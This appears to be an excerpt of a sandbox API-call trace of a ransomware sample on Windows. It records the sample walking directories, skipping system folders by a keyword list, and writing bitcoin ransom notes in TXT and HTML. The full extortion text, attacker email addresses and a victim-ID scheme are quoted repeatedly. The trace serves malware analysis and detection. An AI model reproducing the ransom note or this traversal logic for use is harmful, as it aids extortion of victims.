	[0177.414] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.414] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WDF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF") returned="C:\\Users\\All Users\\Microsoft\\WDF"
	[0177.414] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WDF", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WDF\\*.*"
	[0177.414] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.415] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.415] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.TXT") returned 60
	[0177.415] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wdf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.422] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.422] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.425] CloseHandle (hObject=0x384) returned 1
	[0177.426] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.426] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.427] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.427] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\wdf\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.428] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.428] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.428] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.428] CloseHandle (hObject=0x384) returned 1
	[0177.428] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.429] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.429] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.429] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.HTML") returned 61
	[0177.429] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wdf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.429] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.429] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.433] CloseHandle (hObject=0x384) returned 1
	[0177.433] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.434] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.434] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.436] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.436] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\wdf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.436] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.436] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.436] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.437] CloseHandle (hObject=0x384) returned 1
	[0177.437] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wdf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x83486bb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0177.437] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WDF\\*.*") returned 36
	[0177.437] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.437] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WDF\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\microsoft\\wdf\\*.*") returned 0x24
	[0177.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="windows") returned 0x0
	[0177.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="boot") returned 0x0
	[0177.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="system volume information") returned 0x0
	[0177.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.438] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="temp") returned 0x0
	[0177.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="program files") returned 0x0
	[0177.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.439] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="appdata") returned 0x0
	[0177.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="application data") returned 0x0
	[0177.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="winnt") returned 0x0
	[0177.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="tmp") returned 0x0
	[0177.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.440] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="cache") returned 0x0
	[0177.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="webcache") returned 0x0
	[0177.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="inetcache") returned 0x0
	[0177.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.441] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="nvidia") returned 0x0
	[0177.441] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="packages") returned 0x0
	[0177.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="cookies") returned 0x0
	[0177.442] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.442] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="programdata") returned 0x0
	[0177.442] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.442] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.442] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x83486bb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.443] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.443] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83486bb5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83486bb5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x834ad083, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.443] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83486bb5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83486bb5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83486bb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.443] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83486bb5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83486bb5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83486bb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0177.443] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0177.443] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0177.443] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77d1fe08, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0177.444] lstrcmpW (lpString1="Windows", lpString2="..") returned 1
	[0177.444] lstrcmpW (lpString1="Windows", lpString2=".") returned 1
	[0177.444] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Windows"
	[0177.444] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Windows"
	[0177.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows\\") returned="C:\\Users\\All Users\\Microsoft\\Windows\\"
	[0177.444] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Windows\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows\\") returned="C:\\Users\\All Users\\Microsoft\\Windows\\"
	[0177.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows\\*.*"
	[0177.445] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77d1fe08, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.445] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows\\*.*") returned 40
	[0177.445] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.445] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\windows\\*.*") returned 0x28
	[0177.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.445] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0177.445] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.446] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows") returned="C:\\Users\\All Users\\Microsoft\\Windows"
	[0177.446] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows\\*.*"
	[0177.446] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.446] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.446] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0177.446] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.447] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.447] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.450] CloseHandle (hObject=0x384) returned 1
	[0177.451] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.451] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.452] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.452] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.452] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.453] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.453] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.453] CloseHandle (hObject=0x384) returned 1
	[0177.453] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.453] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.454] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.454] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0177.454] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.454] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
